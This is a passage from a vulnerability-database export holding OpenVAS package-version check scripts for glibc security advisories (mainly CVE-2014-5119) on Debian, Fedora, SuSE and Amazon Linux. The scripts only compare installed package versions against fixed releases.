{\n report += 
res;\n}\nif((res = isdpkgvuln(pkg:\"libc6.1-pic\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6.1-prof\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libc6.1-udeb\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libnss-dns-udeb\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libnss-files-udeb\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"locales\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"locales-all\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"multiarch-support\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"nscd\", ver:\"2.13-38+deb7u7\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:12", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2015-03-05T00:00:00", "id": "OPENVAS:1361412562310869060", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869060", "title": "Fedora Update for glibc FEDORA-2015-2845", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for glibc FEDORA-2015-2845\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General 
Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869060\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-03-05 05:43:08 +0100 (Thu, 05 Mar 2015)\");\n script_cve_id(\"CVE-2014-6040\", \"CVE-2014-7817\", \"CVE-2014-5119\", \"CVE-2014-0475\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for glibc FEDORA-2015-2845\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"glibc on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2015-2845\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2015-March/150631.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 
Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.18~19.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:36:59", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2015-10-13T00:00:00", "id": "OPENVAS:1361412562310850799", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850799", "title": "SuSE Update for glibc SUSE-SU-2014:1125-1 (glibc)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2014_1125_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for glibc SUSE-SU-2014:1125-1 (glibc)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850799\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-13 18:35:00 +0530 (Tue, 13 Oct 2015)\");\n script_cve_id(\"CVE-2014-5119\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for glibc SUSE-SU-2014:1125-1 (glibc)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"This glibc update fixes a critical privilege escalation problem and two\n non-security issues:\n\n * bnc#892073: An off-by-one error leading to a heap-based buffer\n overflow was found in __gconv_translit_find(). An exploit that\n targets the problem is publicly available. 
(CVE-2014-5119)\n\n * bnc#892065: setenv-alloca.patch: Avoid unbound alloca in setenv.\n\n * bnc#888347: printf-multibyte-format.patch: Don't parse %s format\n argument as multi-byte string.\");\n\n script_tag(name:\"affected\", value:\"glibc on SUSE Linux Enterprise Server 11 SP3\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"SUSE-SU\", value:\"2014:1125_1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=SLES11\\.0SP3\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\nres = \"\";\n\nif(release == \"SLES11.0SP3\")\n{\n\n if ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.11.3~17.72.14\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.11.3~17.72.14\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-html\", rpm:\"glibc-html~2.11.3~17.72.14\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-i18ndata\", rpm:\"glibc-i18ndata~2.11.3~17.72.14\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-info\", rpm:\"glibc-info~2.11.3~17.72.14\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale\", rpm:\"glibc-locale~2.11.3~17.72.14\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile\", 
rpm:\"glibc-profile~2.11.3~17.72.14\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.11.3~17.72.14\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-32bit\", rpm:\"glibc-32bit~2.11.3~17.72.14\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-devel-32bit\", rpm:\"glibc-devel-32bit~2.11.3~17.72.14\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale-32bit\", rpm:\"glibc-locale-32bit~2.11.3~17.72.14\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile-32bit\", rpm:\"glibc-profile-32bit~2.11.3~17.72.14\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-locale-x86\", rpm:\"glibc-locale-x86~2.11.3~17.72.14\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-profile-x86\", rpm:\"glibc-profile-x86~2.11.3~17.72.14\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"glibc-x86\", rpm:\"glibc-x86~2.11.3~17.72.14\", rls:\"SLES11.0SP3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:44", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2018-10-01T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120241", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120241", "title": "Amazon Linux Local Check: ALAS-2014-399", "type": "openvas", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2014-399.nasl 6663 2017-07-11 09:58:05Z teissa$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120241\");\n script_version(\"$Revision: 11703 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:21:13 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 10:05:31 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: ALAS-2014-399\");\n script_tag(name:\"insight\", value:\"An off-by-one heap-based buffer overflow flaw was found in glibc's internal __gconv_translit_find() function. 
An attacker able to make an application call the iconv_open() function with a specially crafted argument could possibly use this flaw to execute arbitrary code with the privileges of that application.\");\n script_tag(name:\"solution\", value:\"Run yum update glibc to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-399.html\");\n script_cve_id(\"CVE-2014-5119\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"glibc-devel\", rpm:\"glibc-devel~2.17~55.85.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc\", rpm:\"glibc~2.17~55.85.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-utils\", rpm:\"glibc-utils~2.17~55.85.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"nscd\", rpm:\"nscd~2.17~55.85.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-headers\", rpm:\"glibc-headers~2.17~55.85.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-debuginfo-common\", 
rpm:\"glibc-debuginfo-common~2.17~55.85.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-static\", rpm:\"glibc-static~2.17~55.85.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-common\", rpm:\"glibc-common~2.17~55.85.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"glibc-debuginfo\", rpm:\"glibc-debuginfo~2.17~55.85.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-08-04T10:48:53", "bulletinFamily": "scanner", "description": "Tavis Ormandy discovered a heap-based buffer overflow in the\ntransliteration module loading code in eglibc, Debian's version of the\nGNU C Library. As a result, an attacker who can supply a crafted\ndestination character set argument to iconv-related character\nconversion functions could achieve arbitrary code execution.\n\nThis update removes support of loadable gconv transliteration modules.\nBesides the security vulnerability, the module loading code had\nfunctionality defects which prevented it from working for the intended\npurpose.", "modified": "2017-07-20T00:00:00", "published": "2014-08-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=703012", "id": "OPENVAS:703012", "title": "Debian Security Advisory DSA 3012-1 (eglibc - security update)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3012.nasl 6769 2017-07-20 09:56:33Z teissa $\n# Auto-generated from advisory DSA 3012-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective 
author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_affected = \"eglibc on Debian Linux\";\ntag_solution = \"For the stable distribution (wheezy), this problem has been fixed in\nversion 2.13-38+deb7u4.\n\nWe recommend that you upgrade your eglibc packages.\";\ntag_summary = \"Tavis Ormandy discovered a heap-based buffer overflow in the\ntransliteration module loading code in eglibc, Debian's version of the\nGNU C Library. 
As a result, an attacker who can supply a crafted\ndestination character set argument to iconv-related character\nconversion functions could achieve arbitrary code execution.\n\nThis update removes support of loadable gconv transliteration modules.\nBesides the security vulnerability, the module loading code had\nfunctionality defects which prevented it from working for the intended\npurpose.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(703012);\n script_version(\"$Revision: 6769 $\");\n script_cve_id(\"CVE-2014-5119\");\n script_name(\"Debian Security Advisory DSA 3012-1 (eglibc - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-20 11:56:33 +0200 (Thu, 20 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-08-27 00:00:00 +0200 (Wed, 27 Aug 2014)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-3012.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"eglibc-source\", 
ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"glibc-doc\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc-bin\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc-dev-bin\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-dbg\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-dev\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-dev-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-i686\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-pic\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-prof\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-amd64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dbg\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-amd64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-i386\", ver:\"2.13-38+deb7u4\", 
rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-mips64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-mipsn32\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-ppc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-s390\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-s390x\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-sparc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-i686\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-loongson2f\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-mips64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-mipsn32\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-pic\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-ppc64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-prof\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-s390\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-s390x\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-sparc64\", 
ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-xen\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-dbg\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-dev\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-pic\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6.1-prof\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"locales\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"locales-all\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"multiarch-support\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"nscd\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"eglibc-source\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"glibc-doc\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc-bin\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc-dev-bin\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-dbg\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-dev\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != 
NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-dev-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-i686\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-pic\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc0.1-prof\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-amd64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dbg\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-amd64\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libc6-dev-i386\", ver:\"2.13-38+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = 